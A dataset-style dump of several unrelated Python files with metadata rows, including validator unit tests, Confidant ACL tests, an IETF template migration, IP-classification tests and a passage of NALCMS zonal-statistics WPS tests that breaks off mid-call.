error_checking.assert_is_less_than(SINGLE_ZERO, 0)
def test_assert_is_negative_positive(self):
"""Checks assert_is_less_than; base_value = 0, input_variable > 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_less_than(SINGLE_POSITIVE, 0)
def test_assert_is_negative_numpy_array_positive(self):
"""assert_is_less_than_numpy_array; base_value = 0, inputs > 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_less_than_numpy_array(
POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_negative_numpy_array_non_negative(self):
"""assert_is_less_than_numpy_array; base_value = 0, inputs >= 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_less_than_numpy_array(
NON_NEGATIVE_NUMPY_ARRAY, 0)
def test_assert_is_negative_numpy_array_true(self):
"""assert_is_less_than_numpy_array; base_value = 0, inputs < 0."""
error_checking.assert_is_less_than_numpy_array(NEGATIVE_NUMPY_ARRAY, 0)
def test_assert_is_negative_numpy_array_true_with_nan_allowed(self):
"""Checks assert_is_less_than_numpy_array; base_value = 0, inputs < 0.
In this case, input array contains NaN's and allow_nan = True.
"""
error_checking.assert_is_less_than_numpy_array(
NEGATIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=True)
def test_assert_is_negative_numpy_array_true_with_nan_banned(self):
"""Checks assert_is_less_than_numpy_array; base_value = 0, inputs < 0.
In this case, input array contains NaN's and allow_nan = False.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_less_than_numpy_array(
NEGATIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=False)
def test_assert_is_negative_numpy_array_non_positive(self):
"""assert_is_less_than_numpy_array; base_value = 0, inputs <= 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_less_than_numpy_array(
NON_POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_negative_numpy_array_mixed_sign(self):
"""assert_is_less_than_numpy_array; base_value = 0, inputs mixed."""
with self.assertRaises(ValueError):
error_checking.assert_is_less_than_numpy_array(
MIXED_SIGN_NUMPY_ARRAY, 0)
def test_assert_is_non_positive_negative(self):
"""Checks assert_is_leq with base_value = 0, input_variable < 0."""
error_checking.assert_is_leq(SINGLE_NEGATIVE, 0)
def test_assert_is_non_positive_zero(self):
"""Checks assert_is_leq with base_value = 0, input_variable = 0."""
error_checking.assert_is_leq(SINGLE_ZERO, 0)
def test_assert_is_non_positive_false(self):
"""Checks assert_is_leq with base_value = 0, input_variable > 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_leq(SINGLE_POSITIVE, 0)
def test_assert_is_non_positive_numpy_array_positive(self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs > 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_leq_numpy_array(POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_non_positive_numpy_array_non_negative(self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs >= 0."""
with self.assertRaises(ValueError):
error_checking.assert_is_leq_numpy_array(
NON_NEGATIVE_NUMPY_ARRAY, 0)
def test_assert_is_non_positive_numpy_array_negative(self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs < 0."""
error_checking.assert_is_leq_numpy_array(NEGATIVE_NUMPY_ARRAY, 0)
def test_assert_is_non_positive_numpy_array_negative_with_nan_allowed(self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs < 0.
In this case, input array contains NaN's and allow_nan = True.
"""
error_checking.assert_is_leq_numpy_array(
NEGATIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=True)
def test_assert_is_non_positive_numpy_array_negative_with_nan_banned(self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs < 0.
In this case, input array contains NaN's and allow_nan = False.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_leq_numpy_array(
NEGATIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=False)
def test_assert_is_non_positive_numpy_array_non_positive(self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs <= 0."""
error_checking.assert_is_leq_numpy_array(NON_POSITIVE_NUMPY_ARRAY, 0)
def test_assert_is_non_positive_numpy_array_non_positive_with_nan_allowed(
self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs <= 0.
In this case, input array contains NaN's and allow_nan = True.
"""
error_checking.assert_is_leq_numpy_array(
NON_POSITIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=True)
def test_assert_is_non_positive_numpy_array_non_positive_with_nan_banned(
self):
"""Checks assert_is_leq_numpy_array; base_value = 0, inputs <= 0.
In this case, input array contains NaN's and allow_nan = False.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_leq_numpy_array(
NON_POSITIVE_NUMPY_ARRAY_WITH_NANS, 0, allow_nan=False)
def test_assert_is_non_positive_numpy_array_mixed_sign(self):
"""assert_is_leq_numpy_array; base_value = 0, inputs mixed sign."""
with self.assertRaises(ValueError):
error_checking.assert_is_leq_numpy_array(MIXED_SIGN_NUMPY_ARRAY, 0)
def test_assert_is_valid_latitude_false(self):
"""Checks assert_is_valid_latitude when latitude is invalid."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_latitude(SINGLE_LAT_INVALID_DEG)
def test_assert_is_valid_latitude_true(self):
"""Checks assert_is_valid_latitude when latitude is valid."""
error_checking.assert_is_valid_latitude(SINGLE_LATITUDE_DEG)
def test_assert_is_valid_latitude_nan_allowed(self):
"""Checks assert_is_valid_latitude; input = NaN, allow_nan = True."""
error_checking.assert_is_valid_latitude(numpy.nan, allow_nan=True)
def test_assert_is_valid_latitude_nan_not_allowed(self):
"""Checks assert_is_valid_latitude; input = NaN, allow_nan = False."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_latitude(numpy.nan, allow_nan=False)
def test_assert_is_valid_lat_numpy_array_all_invalid(self):
"""Checks assert_is_valid_lat_numpy_array; all latitudes invalid."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_lat_numpy_array(
LAT_NUMPY_ARRAY_INVALID_DEG)
def test_assert_is_valid_lat_numpy_array_some_invalid(self):
"""Checks assert_is_valid_lat_numpy_array; some latitudes invalid."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_lat_numpy_array(
LAT_NUMPY_ARRAY_SOME_INVALID_DEG)
def test_assert_is_valid_lat_numpy_array_true(self):
"""Checks assert_is_valid_lat_numpy_array; all latitudes valid."""
error_checking.assert_is_valid_lat_numpy_array(LAT_NUMPY_ARRAY_DEG)
def test_assert_is_valid_lat_numpy_array_true_with_nan_allowed(self):
"""Checks assert_is_valid_lat_numpy_array; all latitudes valid or NaN.
In this case, allow_nan = True."""
error_checking.assert_is_valid_lat_numpy_array(
LAT_NUMPY_ARRAY_WITH_NANS_DEG, allow_nan=True)
def test_assert_is_valid_lat_numpy_array_true_with_nan_banned(self):
"""Checks assert_is_valid_lat_numpy_array; all latitudes valid or NaN.
In this case, allow_nan = False."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_lat_numpy_array(
LAT_NUMPY_ARRAY_WITH_NANS_DEG, allow_nan=False)
def test_assert_is_valid_longitude_false(self):
"""Checks assert_is_valid_longitude when longitude is invalid."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_longitude(SINGLE_LNG_INVALID_DEG)
def test_assert_is_valid_longitude_true(self):
"""Checks assert_is_valid_longitude when longitude is valid."""
error_checking.assert_is_valid_longitude(SINGLE_LONGITUDE_DEG)
def test_assert_is_valid_longitude_positive_in_west_false(self):
"""Checks assert_is_valid_longitude with positive_in_west_flag = True.
In this case, longitude is negative in western hemisphere.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_longitude(
SINGLE_LNG_NEGATIVE_IN_WEST_DEG, positive_in_west_flag=True)
def test_assert_is_valid_longitude_positive_in_west_true(self):
"""Checks assert_is_valid_longitude with positive_in_west_flag = True.
In this case, longitude is positive in western hemisphere.
"""
error_checking.assert_is_valid_longitude(
SINGLE_LNG_POSITIVE_IN_WEST_DEG, positive_in_west_flag=True)
def test_assert_is_valid_longitude_negative_in_west_false(self):
"""Checks assert_is_valid_longitude with negative_in_west_flag = True.
In this case, longitude is positive in western hemisphere.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_longitude(
SINGLE_LNG_POSITIVE_IN_WEST_DEG, negative_in_west_flag=True)
def test_assert_is_valid_longitude_negative_in_west_true(self):
"""Checks assert_is_valid_longitude with negative_in_west_flag = True.
In this case, longitude is negative in western hemisphere.
"""
error_checking.assert_is_valid_longitude(
SINGLE_LNG_NEGATIVE_IN_WEST_DEG, negative_in_west_flag=True)
def test_assert_is_valid_lng_numpy_array_all_invalid(self):
"""Checks assert_is_valid_lng_numpy_array; all longitudes invalid."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_lng_numpy_array(
LNG_NUMPY_ARRAY_INVALID_DEG)
def test_assert_is_valid_lng_numpy_array_some_invalid(self):
"""Checks assert_is_valid_lng_numpy_array; some longitudes invalid."""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_lng_numpy_array(
LNG_NUMPY_ARRAY_SOME_INVALID_DEG)
def test_assert_is_valid_lng_numpy_array_true(self):
"""Checks assert_is_valid_lng_numpy_array; all longitudes valid."""
error_checking.assert_is_valid_lng_numpy_array(LNG_NUMPY_ARRAY_DEG)
def test_assert_is_valid_lng_numpy_array_positive_in_west_false(self):
"""Checks assert_is_valid_lng_numpy_array; positive_in_west_flag = True.
In this case, longitudes in western hemisphere are negative.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_lng_numpy_array(
LNG_NUMPY_ARRAY_NEGATIVE_IN_WEST_DEG,
positive_in_west_flag=True)
def test_assert_is_valid_lng_numpy_array_positive_in_west_true(self):
"""Checks assert_is_valid_lng_numpy_array; positive_in_west_flag = True.
In this case, longitudes in western hemisphere are positive.
"""
error_checking.assert_is_valid_lng_numpy_array(
LNG_NUMPY_ARRAY_POSITIVE_IN_WEST_DEG, positive_in_west_flag=True)
def test_assert_is_valid_lng_numpy_array_negative_in_west_false(self):
"""Checks assert_is_valid_lng_numpy_array; negative_in_west_flag = True.
In this case, longitudes in western hemisphere are positive.
"""
with self.assertRaises(ValueError):
error_checking.assert_is_valid_lng_numpy_array(
LNG_NUMPY_ARRAY_POSITIVE_IN_WEST_DEG,
negative_in_west_flag=True)
def test_assert_is_valid_lng_numpy_array_negative_in_west_true(self):
"""Checks assert_is_valid_lng_numpy_array; negative_in_west_flag = True.
In this case, longitudes in western hemisphere are negative.
"""
error_checking.assert_is_valid_lng_numpy_array(
LNG_NUMPY_ARRAY_NEGATIVE_IN_WEST_DEG, negative_in_west_flag=True)
if __name__ == '__main__':
unittest.main()
| 39.728188 | 80 | 0.65356 | 5,895 | 47,356 | 4.780322 | 0.034266 | 0.12264 | 0.071505 | 0.07665 | 0.950745 | 0.922214 | 0.870866 | 0.814514 | 0.727821 | 0.644677 | 0 | 0.020633 | 0.263113 | 47,356 | 1,191 | 81 | 39.761545 | 0.78691 | 0.219845 | 0 | 0.377953 | 0 | 0 | 0.001622 | 0 | 0 | 0 | 0 | 0 | 0.644094 | 1 | 0.244094 | false | 0 | 0.007874 | 0 | 0.253543 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
c1571424ea613accfbfe9fb9f10ec399bde03164 | 192 | py | Python | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/margay/phys/Phys_Internal_WiSUN.py | PascalGuenther/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 69 | 2021-12-16T01:34:09.000Z | 2022-03-31T08:27:39.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/margay/phys/Phys_Internal_WiSUN.py | PascalGuenther/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 6 | 2022-01-12T18:22:08.000Z | 2022-03-25T10:19:27.000Z | platform/radio/efr32_multiphy_configurator/pyradioconfig/parts/margay/phys/Phys_Internal_WiSUN.py | PascalGuenther/gecko_sdk | 2e82050dc8823c9fe0e8908c1b2666fb83056230 | [
"Zlib"
] | 21 | 2021-12-20T09:05:45.000Z | 2022-03-28T02:52:28.000Z | from pyradioconfig.parts.ocelot.phys.Phys_Internal_WiSUN import PHYS_Internal_WiSUN_Ocelot
class PHYS_Internal_WiSUN_Margay(PHYS_Internal_WiSUN_Ocelot):
    # Inherit all from Ocelot.
pass | 32 | 90 | 0.854167 | 27 | 192 | 5.666667 | 0.481481 | 0.313725 | 0.444444 | 0.300654 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.104167 | 192 | 6 | 91 | 32 | 0.889535 | 0.119792 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.333333 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 8 |
c16c660267cc75901291803a3421159a6b2696eb | 4,678 | py | Python | tests/unit/confidant/authnz/rbac_test.py | chadwhitacre/confidant | dd788147b355f760767cf3b9487671c67948ade3 | [
"Apache-2.0"
] | 1,820 | 2015-11-04T17:57:16.000Z | 2022-03-31T16:47:24.000Z | tests/unit/confidant/authnz/rbac_test.py | chadwhitacre/confidant | dd788147b355f760767cf3b9487671c67948ade3 | [
"Apache-2.0"
] | 186 | 2015-11-04T18:21:52.000Z | 2022-01-14T20:31:31.000Z | tests/unit/confidant/authnz/rbac_test.py | isabella232/confidant | 3dac318c3e1f29bae5771084ad29a4bc121f1771 | [
"Apache-2.0"
] | 136 | 2015-11-04T19:23:14.000Z | 2022-02-25T01:51:29.000Z | from confidant.app import create_app
from confidant.authnz import rbac
def test_default_acl(mocker):
mocker.patch('confidant.settings.USE_AUTH', True)
app = create_app()
with app.test_request_context('/fake'):
g_mock = mocker.patch('confidant.authnz.g')
# Test for user type is user
g_mock.user_type = 'user'
assert rbac.default_acl(resource_type='service') is True
assert rbac.default_acl(resource_type='certificate') is False
# Test for user type is service, but not an allowed resource type
g_mock.user_type = 'service'
g_mock.username = 'test-service'
assert rbac.default_acl(
resource_type='service',
action='update',
resource_id='test-service'
) is False
# Test for user type is service, and an allowed resource, with metadata
# action, but service name doesn't match
g_mock.username = 'bad-service'
assert rbac.default_acl(
resource_type='service',
action='metadata',
resource_id='test-service',
) is False
# Test for user type is service, and an allowed resource, with metadata
# action
g_mock.username = 'test-service'
assert rbac.default_acl(
resource_type='service',
action='metadata',
resource_id='test-service',
) is True
# Test for user type is service, and an allowed resource, with get
# action
assert rbac.default_acl(
resource_type='service',
action='get',
resource_id='test-service',
) is True
# Test for user type is service, with certificate resource and get
# action, with a CN that doesn't match the name pattern
assert rbac.default_acl(
resource_type='certificate',
action='get',
# missing domain name...
resource_id='test-service',
kwargs={'ca': 'development'},
) is False
# Test for user type is service, with certificate resource and get
# action, with a valid CN
assert rbac.default_acl(
resource_type='certificate',
action='get',
resource_id='test-service.example.com',
kwargs={'ca': 'development'},
) is True
# Test for user type is service, with certificate resource and get
# action, with a valid CN, and valid SAN values
assert rbac.default_acl(
resource_type='certificate',
action='get',
resource_id='test-service.example.com',
kwargs={
'ca': 'development',
'san': [
'test-service.internal.example.com',
'test-service.external.example.com',
],
},
) is True
# Test for user type is service, with certificate resource and get
# action, with an invalid CN
assert rbac.default_acl(
resource_type='certificate',
action='get',
resource_id='bad-service.example.com',
kwargs={'ca': 'development'},
) is False
# Test for user type is service, with certificate resource and get
# action, with a valid CN, but an invalid SAN
assert rbac.default_acl(
resource_type='certificate',
action='get',
resource_id='test-service.example.com',
kwargs={
'ca': 'development',
'san': ['bad-service.example.com'],
},
) is False
# Test for user type is service, with certificate resource and get
# action, with a valid CN, but a mix of valid and invalid SAN values
assert rbac.default_acl(
resource_type='certificate',
action='get',
resource_id='test-service.example.com',
kwargs={
'ca': 'development',
'san': [
'bad-service.example.com',
'test-service.example.com',
],
},
) is False
# Test for user type is service, and an allowed resource, with
# disallowed fake action
assert rbac.default_acl(resource_type='service', action='fake') is False
# Test for bad user type
g_mock.user_type = 'badtype'
assert rbac.default_acl(resource_type='service', action='get') is False
def test_no_acl():
app = create_app()
with app.test_request_context('/fake'):
assert rbac.no_acl(resource_type='service', action='update') is True
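# Taken together, the cases above pin down the default policy: users pass the
# check for service resources but not certificates; a service can run
# "metadata" and "get" (never "update") against resources whose name matches
# its own username, and can fetch certificates only when the CN and every SAN
# match its name pattern (e.g. test-service.example.com); unknown actions and
# user types are denied. no_acl short-circuits all of that and always allows.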
| 38.344262 | 80 | 0.572681 | 540 | 4,678 | 4.846296 | 0.131481 | 0.048911 | 0.085976 | 0.106993 | 0.800535 | 0.781047 | 0.765762 | 0.727933 | 0.716087 | 0.60642 | 0 | 0 | 0.332835 | 4,678 | 121 | 81 | 38.661157 | 0.838513 | 0.241556 | 0 | 0.717391 | 0 | 0 | 0.19841 | 0.080045 | 0 | 0 | 0 | 0 | 0.163043 | 1 | 0.021739 | false | 0 | 0.021739 | 0 | 0.043478 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c1e8324ef9932e75139975c144077f30eb1e5edf | 1,780 | py | Python | ietf/dbtemplate/migrations/0007_adjust_review_assigned.py | hassanakbar4/ietfdb | cabee059092ae776015410640226064331c293b7 | [
"BSD-3-Clause"
] | 25 | 2022-03-05T08:26:52.000Z | 2022-03-30T15:45:42.000Z | ietf/dbtemplate/migrations/0007_adjust_review_assigned.py | hassanakbar4/ietfdb | cabee059092ae776015410640226064331c293b7 | [
"BSD-3-Clause"
] | 219 | 2022-03-04T17:29:12.000Z | 2022-03-31T21:16:14.000Z | ietf/dbtemplate/migrations/0007_adjust_review_assigned.py | hassanakbar4/ietfdb | cabee059092ae776015410640226064331c293b7 | [
"BSD-3-Clause"
] | 22 | 2022-03-04T15:34:34.000Z | 2022-03-28T13:30:59.000Z | # Copyright The IETF Trust 2019-2020, All Rights Reserved
# -*- coding: utf-8 -*-
# Generated by Django 1.11.26 on 2019-11-19 11:47
from django.db import migrations
def forward(apps, schema_editor):
DBTemplate = apps.get_model('dbtemplate','DBTemplate')
qs = DBTemplate.objects.filter(path='/group/defaults/email/review_assigned.txt')
qs.update(content="""{{ assigner.ascii }} has assigned {{ reviewer.person.ascii }} as a reviewer for this document.
{% if prev_team_reviews %}This team has completed other reviews of this document:{% endif %}{% for assignment in prev_team_reviews %}
- {{ assignment.completed_on }} {{ assignment.reviewer.person.ascii }} -{% if assignment.reviewed_rev %}{{ assignment.reviewed_rev }}{% else %}{{ assignment.review_request.requested_rev }}{% endif %} {{ assignment.result.name }}
{% endfor %}
""")
qs.update(title="Default template for review assignment email")
def reverse(apps, schema_editor):
DBTemplate = apps.get_model('dbtemplate','DBTemplate')
qs = DBTemplate.objects.filter(path='/group/defaults/email/review_assigned.txt')
qs.update(content="""{{ assigner.ascii }} has assigned you as a reviewer for this document.
{% if prev_team_reviews %}This team has completed other reviews of this document:{% endif %}{% for assignment in prev_team_reviews %}
- {{ assignment.completed_on }} {{ assignment.reviewer.person.ascii }} -{% if assignment.reviewed_rev %}{{ assignment.reviewed_rev }}{% else %}{{ assignment.review_request.requested_rev }}{% endif %} {{ assignment.result.name }}
{% endfor %}
""")
class Migration(migrations.Migration):
dependencies = [
('dbtemplate', '0006_add_review_assigned_template'),
]
operations = [
migrations.RunPython(forward, reverse)
]
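# migrations.RunPython(forward, reverse) above makes this data migration
# reversible: forward rewrites the review-assignment email template to name
# the assigned reviewer and sets a new title, while reverse restores the
# original "assigned you" wording.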
| 45.641026 | 230 | 0.711798 | 218 | 1,780 | 5.683486 | 0.389908 | 0.038741 | 0.048426 | 0.041969 | 0.724778 | 0.724778 | 0.724778 | 0.724778 | 0.724778 | 0.724778 | 0 | 0.019659 | 0.142697 | 1,780 | 38 | 231 | 46.842105 | 0.792267 | 0.070225 | 0 | 0.48 | 1 | 0.2 | 0.686251 | 0.278619 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.04 | 0 | 0.24 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e732b213a90ee4d761fc843371eb7c25a5758b25 | 1,578 | py | Python | tests/test_helper_network.py | manageacloud/manageacloud-cli | 1b7d9d5239f9e51f97d0377d223db0f58ca0ca7c | [
"MIT"
] | 6 | 2015-09-21T09:02:04.000Z | 2017-02-08T23:40:18.000Z | tests/test_helper_network.py | manageacloud/manageacloud-cli | 1b7d9d5239f9e51f97d0377d223db0f58ca0ca7c | [
"MIT"
] | 3 | 2015-11-03T01:44:29.000Z | 2016-03-25T08:36:15.000Z | tests/test_helper_network.py | manageacloud/manageacloud-cli | 1b7d9d5239f9e51f97d0377d223db0f58ca0ca7c | [
"MIT"
] | 4 | 2015-07-06T01:46:13.000Z | 2019-01-10T23:08:19.000Z | import unittest
from tests.mock_data import *
import maccli.helper.network
class AuthTestCase(unittest.TestCase):
def test_network(self):
self.assertTrue(maccli.helper.network.is_ip_private("127.0.0.1"))
self.assertTrue(maccli.helper.network.is_ip_private("192.168.0.1"))
self.assertFalse(maccli.helper.network.is_ip_private("162.243.152.74"))
self.assertTrue(maccli.helper.network.is_ip_private("10.10.10.10"))
self.assertFalse(maccli.helper.network.is_ip_private("172.2.1.2"))
self.assertTrue(maccli.helper.network.is_ip_private("172.16.1.2"))
self.assertTrue(maccli.helper.network.is_ip_private("172.30.1.2"))
self.assertTrue(maccli.helper.network.is_ip_private("172.31.1.2"))
self.assertTrue(maccli.helper.network.is_ip_private("172.31.36.70"))
self.assertFalse(maccli.helper.network.is_ip_private("172.32.1.2"))
def test_local_loop(self):
self.assertTrue(maccli.helper.network.is_local("127.0.0.1"))
self.assertFalse(maccli.helper.network.is_local("192.168.0.1"))
self.assertFalse(maccli.helper.network.is_local("162.243.152.74"))
self.assertFalse(maccli.helper.network.is_local("10.10.10.10"))
self.assertFalse(maccli.helper.network.is_local("172.2.1.2"))
self.assertFalse(maccli.helper.network.is_local("172.16.1.2"))
self.assertFalse(maccli.helper.network.is_local("172.30.1.2"))
self.assertFalse(maccli.helper.network.is_local("172.31.1.2"))
self.assertFalse(maccli.helper.network.is_local("172.32.1.2"))
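# The assertions above pin down the expected classification: the RFC 1918
# ranges (10.0.0.0/8, 172.16.0.0/12 -- hence 172.16-172.31 but not 172.2 or
# 172.32 -- and 192.168.0.0/16) plus loopback count as private, while only
# the loopback address counts as "local". A minimal reimplementation with the
# standard library is sketched below; it is an assumption about the helper's
# behaviour, not its actual code.
import ipaddress


def _is_ip_private_sketch(ip):
    # is_private is True for the RFC 1918 ranges and for loopback addresses.
    return ipaddress.ip_address(ip).is_private


def _is_local_sketch(ip):
    return ipaddress.ip_address(ip).is_loopback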
| 52.6 | 79 | 0.709759 | 243 | 1,578 | 4.473251 | 0.164609 | 0.220791 | 0.349586 | 0.367065 | 0.873965 | 0.828887 | 0.828887 | 0.75161 | 0.614535 | 0.515179 | 0 | 0.103548 | 0.124842 | 1,578 | 29 | 80 | 54.413793 | 0.683563 | 0 | 0 | 0 | 0 | 0 | 0.126743 | 0 | 0 | 0 | 0 | 0 | 0.76 | 1 | 0.08 | false | 0 | 0.12 | 0 | 0.24 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
e73b91dd34d5e6b02262862a535e92a4bdb4b955 | 7,524 | py | Python | tests/test_wps_nalcms_zonal_stats.py | fossabot/raven | b5ed6258a4c09ac4d132873d6b8b4a1d82d2131b | [
"MIT"
] | 29 | 2018-08-13T20:16:41.000Z | 2022-03-17T02:31:38.000Z | tests/test_wps_nalcms_zonal_stats.py | fossabot/raven | b5ed6258a4c09ac4d132873d6b8b4a1d82d2131b | [
"MIT"
] | 359 | 2018-05-31T00:37:53.000Z | 2022-03-26T04:35:43.000Z | tests/test_wps_nalcms_zonal_stats.py | fossabot/raven | b5ed6258a4c09ac4d132873d6b8b4a1d82d2131b | [
"MIT"
] | 10 | 2019-06-17T18:07:46.000Z | 2022-02-15T02:01:32.000Z | import json
import pytest
from metalink import download as md
from pywps import Service
from pywps.tests import assert_response_success
from ravenpy.utilities.testdata import get_local_testdata
from shapely.geometry import MultiPolygon
from raven.processes import (
NALCMSZonalStatisticsProcess,
NALCMSZonalStatisticsRasterProcess,
)
from .common import CFG_FILE, client_for, count_pixels, get_output
class TestNALCMSZonalStatsProcess:
def test_simplified_categories(self):
client = client_for(
Service(processes=[NALCMSZonalStatisticsProcess()], cfgfiles=CFG_FILE)
)
fields = [
"select_all_touching={touches}",
"simple_categories={simple_categories}",
"band={band}",
"shape=file@xlink:href=file://{shape}",
"raster=file@xlink:href=file://{raster}",
]
datainputs = ";".join(fields).format(
touches=True,
simple_categories=True,
band=1,
shape=get_local_testdata("donneesqc_mrc_poly/mrc_subset.gml"),
raster=get_local_testdata("cec_nalcms2010_30m/cec_nalcms_subQC.tiff"),
)
resp = client.get(
service="WPS",
request="Execute",
version="1.0.0",
identifier="nalcms-zonal-stats",
datainputs=datainputs,
)
assert_response_success(resp)
out = get_output(resp.xml)
stats = json.loads(out["statistics"])[0]
assert not {"count", "nodata", "nan"}.issubset(stats)
geometry = json.loads(out["features"])
assert isinstance(type(geometry), type(MultiPolygon))
category_counts = count_pixels(stats)
assert category_counts == geometry["features"][0]["properties"]["count"]
assert sum(stats.values()) == geometry["features"][0]["properties"]["count"]
def test_true_categories(self):
client = client_for(
Service(
processes=[
NALCMSZonalStatisticsProcess(),
],
cfgfiles=CFG_FILE,
)
)
fields = [
"select_all_touching={touches}",
"simple_categories={simple_categories}",
"band={band}",
"shape=file@xlink:href=file://{shape}",
"raster=file@xlink:href=file://{raster}",
]
datainputs = ";".join(fields).format(
touches=True,
simple_categories=False,
band=1,
shape=get_local_testdata("donneesqc_mrc_poly/mrc_subset.gml"),
raster=get_local_testdata("cec_nalcms2010_30m/cec_nalcms_subQC.tiff"),
)
resp = client.get(
service="WPS",
request="Execute",
version="1.0.0",
identifier="nalcms-zonal-stats",
datainputs=datainputs,
)
assert_response_success(resp)
out = get_output(resp.xml)
stats = json.loads(out["statistics"])[0]
assert not {"count", "nodata", "nan"}.issubset(stats)
geometry = json.loads(out["features"])
assert isinstance(type(geometry), type(MultiPolygon))
category_counts = count_pixels(stats)
assert category_counts == geometry["features"][0]["properties"]["count"]
assert sum(stats.values()) == geometry["features"][0]["properties"]["count"]
def test_wcs_simplified_categories(self):
client = client_for(
Service(processes=[NALCMSZonalStatisticsProcess()], cfgfiles=CFG_FILE)
)
fields = [
"select_all_touching={touches}",
"simple_categories={simple_categories}",
"band={band}",
"shape=file@xlink:href=file://{shape}",
]
datainputs = ";".join(fields).format(
touches=True,
simple_categories=True,
band=1,
shape=get_local_testdata("watershed_vector/Basin_test.zip"),
)
resp = client.get(
service="WPS",
request="Execute",
version="1.0.0",
identifier="nalcms-zonal-stats",
datainputs=datainputs,
)
assert_response_success(resp)
out = get_output(resp.xml)
stats = json.loads(out["statistics"])[0]
assert not {"count", "nodata", "nan"}.issubset(stats)
geometry = json.loads(out["features"])
assert isinstance(type(geometry), type(MultiPolygon))
category_counts = count_pixels(stats)
assert category_counts == geometry["features"][0]["properties"]["count"]
assert sum(stats.values()) == geometry["features"][0]["properties"]["count"]
def test_wcs_true_categories(self):
client = client_for(
Service(processes=[NALCMSZonalStatisticsProcess()], cfgfiles=CFG_FILE)
)
fields = [
"select_all_touching={touches}",
"simple_categories={simple_categories}",
"band={band}",
"shape=file@xlink:href=file://{shape}",
]
datainputs = ";".join(fields).format(
touches=True,
simple_categories=False,
band=1,
shape=get_local_testdata("watershed_vector/Basin_test.zip"),
)
resp = client.get(
service="WPS",
request="Execute",
version="1.0.0",
identifier="nalcms-zonal-stats",
datainputs=datainputs,
)
assert_response_success(resp)
out = get_output(resp.xml)
stats = json.loads(out["statistics"])[0]
assert not {"count", "nodata", "nan"}.issubset(stats)
geometry = json.loads(out["features"])
assert isinstance(type(geometry), type(MultiPolygon))
category_counts = count_pixels(stats)
assert category_counts == geometry["features"][0]["properties"]["count"]
assert sum(stats.values()) == geometry["features"][0]["properties"]["count"]
@pytest.mark.online
class TestNALCMSZonalStatsWithRasterProcess:
def test_wcs_simplified_categories(self):
client = client_for(
Service(processes=[NALCMSZonalStatisticsRasterProcess()], cfgfiles=CFG_FILE)
)
fields = [
"select_all_touching={touches}",
"simple_categories={simple_categories}",
"band={band}",
"shape=file@xlink:href=file://{shape}",
]
datainputs = ";".join(fields).format(
touches=True,
simple_categories=True,
band=1,
